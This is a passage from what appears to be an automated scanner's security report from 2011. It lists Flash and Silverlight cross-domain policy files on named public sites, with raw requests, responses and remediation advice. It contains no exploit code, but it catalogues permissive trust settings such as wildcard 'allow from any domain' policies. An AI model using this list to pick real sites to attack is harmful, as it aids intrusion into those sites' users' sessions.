<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

6.89. http://www.habitablezone.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.habitablezone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.habitablezone.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:06:10 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 09 Nov 2009 03:13:40 GMT
ETag: "1881b-3d2-477e794890100"
Accept-Ranges: bytes
Content-Length: 978
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="localhost" to-ports="20-65535"/>
   <allow-access-from domain="*.local" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="192.168.0.*" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.robert-shepherd.net" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.dev.robert-shepherd.net" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.habitablezone.net" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.dev.habitablezone.net" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.robert-shepherd.com" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.dev.robert-shepherd.com" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.habitablezone.com" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.dev.habitablezone.com" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="192.168.0.100" to-ports="20-65535"/>
...[SNIP]...

6.90. http://www.hoovers.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.hoovers.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hoovers.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:36 GMT
Server: Apache
Last-Modified: Fri, 21 Jan 2011 00:59:01 GMT
ETag: "bf"
Accept-Ranges: bytes
Content-Length: 191
Vary: Accept-Encoding
Content-Type: text/xml
Set-Cookie: HID=173.193.214.243.1296352416699562; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
Set-Cookie: BIGipServerhaspriv-colo1=201052682.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Connection: close
Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.brightcove.com" secure="false"/>
<allow-access-from domain="*.hoovers.com" secure="false"/>
</cross-domain-policy>

6.91. http://www.msnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.msnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:07:03 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.92. https://www.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:07 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "3c057-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=1000
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.93. http://www.polls.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.polls.newsvine.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "a14031-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Content-Type: text/xml
Date: Sun, 30 Jan 2011 01:23:01 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.94. http://www.popularmechanics.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.popularmechanics.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popularmechanics.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
Cache-Control: max-age=422
Date: Sun, 30 Jan 2011 03:18:22 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...

6.95. http://www.reuters.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:18 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 30 Jan 2011 02:08:18 GMT
browser-expires: Sun, 30 Jan 2011 02:03:18 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 791
Vary: Accept-Encoding
Connection: close
Set-Cookie: SSLB=A;path=/;domain=www.reuters.com;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.uk.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="feedroom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oho.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.metacarta.com" secure="false"/>
...[SNIP]...

6.96. http://www.signonsandiego.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.signonsandiego.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.signonsandiego.com

Response

HTTP/1.1 200 OK
Expires: Sun, 30 Jan 2011 03:20:09 GMT
ETag: "ffb94896b4e86f190cf7f815218e6848"
Cache-Control: max-age=60
Last-Modified: Sun, 30 Jan 2011 03:19:09 GMT
Content-Type: text/xml
Server: Apache/2.2.10
Content-Length: 355
Date: Sun, 30 Jan 2011 03:19:09 GMT
X-Varnish: 1618713424
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.signonsandiego.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.sosd" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" />
...[SNIP]...

6.97. http://www.tigerdirect.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tigerdirect.com

Response

HTTP/1.0 200 OK
Content-Length: 794
Content-Type: text/xml
Last-Modified: Fri, 10 Sep 2010 18:55:14 GMT
Accept-Ranges: bytes
ETag: "38d3bcb31951cb1:4f9"
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:24:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.compusa.com" />
<allow-access-from domain="*.compusa.pr" />
<allow-access-from domain="images.highspeedbackbone.net" />
...[SNIP]...
<allow-access-from domain="retail.tigerdirect.com" />
   <allow-access-from domain="www.tigerdirect.ca" />
<allow-access-from domain="retail.tigertirect.ca" />
   <allow-access-from domain="www.circuitcity.com" />
   <allow-access-from domain="com.puter.tv" />
   <allow-access-from domain="compusa.tv" />
   <allow-access-from domain="pinkfriday.org" />
   <allow-access-from domain="charitypcrace.com" />
...[SNIP]...

6.98. http://www.walmart.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.walmart.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15
Last-Modified: Fri, 19 Jun 2009 00:03:46 GMT
ETag: "30db8-137-46ca84217bc80"
Cache-Control: max-age=7200
Expires: Sun, 30 Jan 2011 04:03:54 GMT
Content-Type: application/xml
Date: Sun, 30 Jan 2011 02:03:54 GMT
Content-Length: 311
Connection: close
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907970a45525d5f4f58455e445a4a423660;path=/
Set-Cookie: SSLB=0; path=/; domain=.walmart.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.walmart.com" />
<allow-access-from domain="*.richfx.com" />
<allow-access-from domain="*.edgesuite.net" />
...[SNIP]...

6.99. http://www.zacks.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.zacks.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zacks.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:18 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
Last-Modified: Thu, 19 Nov 2009 20:44:21 GMT
ETag: "2a8585e-159-478bf6c7c1340"
Accept-Ranges: bytes
Content-Length: 345
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Expires: Sun, 30 Jan 2011 02:04:18 GMT
Pragma: no-cache
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.zacks.com" />
<allow-access-from domain="zacks.com" />
<allow-access-from domain="zackselite.com" />
<allow-access-from domain="www.zackselite.com" />
...[SNIP]...

6.100. http://advertising.redacted/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://advertising.msn.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: advertising.redacted

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 303
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:05:25 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="video.redacted" />
<allow-access-from domain="images.video.redacted" />
<allow-access-from domain="fp.advertising.microsoft.com" />
<allow-access-from domain="fporigin.advertising.microsoft.com" />
...[SNIP]...

6.101. http://articles.redacted/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://articles.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: articles.moneycentral.msn.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Sun, 30 Jan 2011 02:05:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA42
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
ETag: "66a0b61d6a90cb1:ddd"
Last-Modified: Tue, 30 Nov 2010 08:39:34 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 573

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="articles.moneycentral.alpha.msn-int.com" secure="true"/>
<allow-access-from domain="redacted" secure="true"/>
<allow-access-from domain="blstc.redacted" secure="true"/>
<allow-access-from domain="stc.alphablu.msn-int.com" secure="true"/>
<allow-access-from domain="hs.interpolls.com" secure="true" />
<allow-access-from domain="i.interpolls.com" secure="true" />
...[SNIP]...

6.102. http://seedmagazine.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seedmagazine.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: seedmagazine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:02 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Tue, 10 Mar 2009 18:58:25 GMT
ETag: "2e80e1-d8-55f1f640"
Accept-Ranges: bytes
Content-Length: 216
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s3.amazonaws.com" />
</cros
...[SNIP]...

6.103. https://twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:03:08 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1296356588603269; path=/; expires=Sun, 06-Feb-11 03:03:08 GMT; domain=.twitter.com
Last-Modified: Sat, 29 Jan 2011 02:37:05 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 30 Jan 2011 03:33:08 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.104. http://www.livescience.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livescience.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livescience.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:40 GMT
Server: Apache
Last-Modified: Tue, 02 Dec 2008 19:13:20 GMT
ETag: "39d1169-38f-45d151ed7d400"
Accept-Ranges: bytes
Content-Length: 911
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="dev.livescience.com" />
...[SNIP]...
<allow-access-from domain="staging.livescience.com" />
<allow-access-from domain="livescience.com" />
<allow-access-from domain="dev.newsarama.com" />
<allow-access-from domain="www.newsarama.com" />
<allow-access-from domain="staging.newsarama.com" />
<allow-access-from domain="newsarama.com" />
<allow-access-from domain="dev.aviation.com" />
<allow-access-from domain="www.aviation.com" />
<allow-access-from domain="aviation.com" />
<allow-access-from domain="dev.space.com" />
<allow-access-from domain="www.space.com" />
<allow-access-from domain="space.com" />
...[SNIP]...

6.105. http://www.twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:38 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1296357578943403; path=/; expires=Sun, 06-Feb-11 03:19:38 GMT; domain=.twitter.com
Last-Modified: Sat, 29 Jan 2011 02:47:24 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 30 Jan 2011 03:49:38 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
   <allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

7. Silverlight cross-domain policy previous next
There are 26 instances of this issue:

http://ad.ae.doubleclick.net/clientaccesspolicy.xml
http://b.rad.redacted/clientaccesspolicy.xml
http://b.voicefive.com/clientaccesspolicy.xml
http://ec.redcated/clientaccesspolicy.xml
http://jp.video.redacted/clientaccesspolicy.xml
http://latino.aol.com/clientaccesspolicy.xml
http://latino.video.redacted/clientaccesspolicy.xml
http://netscape.aol.com/clientaccesspolicy.xml
http://ninemsn.video.redacted/clientaccesspolicy.xml
http://s0.2mdn.net/clientaccesspolicy.xml
http://wrapper.g.redacted/clientaccesspolicy.xml
http://www.ticketcity.com/clientaccesspolicy.xml
http://blstj.redacted/clientaccesspolicy.xml
http://dateline.msnbc.com/clientaccesspolicy.xml
http://explore.live.com/clientaccesspolicy.xml
http://hardball.msnbc.com/clientaccesspolicy.xml
http://msnbc.com/clientaccesspolicy.xml
http://msnbcmedia.redacted/clientaccesspolicy.xml
http://mtp.msnbc.com/clientaccesspolicy.xml
http://nbcsports.msnbc.com/clientaccesspolicy.xml
http://nightly.msnbc.com/clientaccesspolicy.xml
http://rachel.msnbc.com/clientaccesspolicy.xml
http://today.msnbc.com/clientaccesspolicy.xml
http://tv.msnbc.com/clientaccesspolicy.xml
http://www.msnbc.com/clientaccesspolicy.xml
http://services.money.redacted/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://ad.ae.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.ae.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.ae.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 14:50:55 GMT
Date: Sun, 30 Jan 2011 14:48:18 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.rad.redacted/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.rad.redacted

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 01:07:24 GMT
Accept-Ranges: bytes
ETag: "02ee18f7b9cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:40:48 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

7.3. http://b.voicefive.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 31 Jan 2011 01:40:59 GMT
Date: Sun, 30 Jan 2011 01:40:59 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.4. http://ec.redcated/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ec.redcated
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ec.redcated

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Age: 134956
Date: Sun, 30 Jan 2011 02:08:12 GMT
Expires: Fri, 04 Feb 2011 12:38:56 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.5. http://jp.video.redacted/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jp.video.redacted
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: jp.video.redacted

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/xml
Last-Modified: Sun, 22 Jun 2008 10:46:32 GMT
Accept-Ranges: bytes
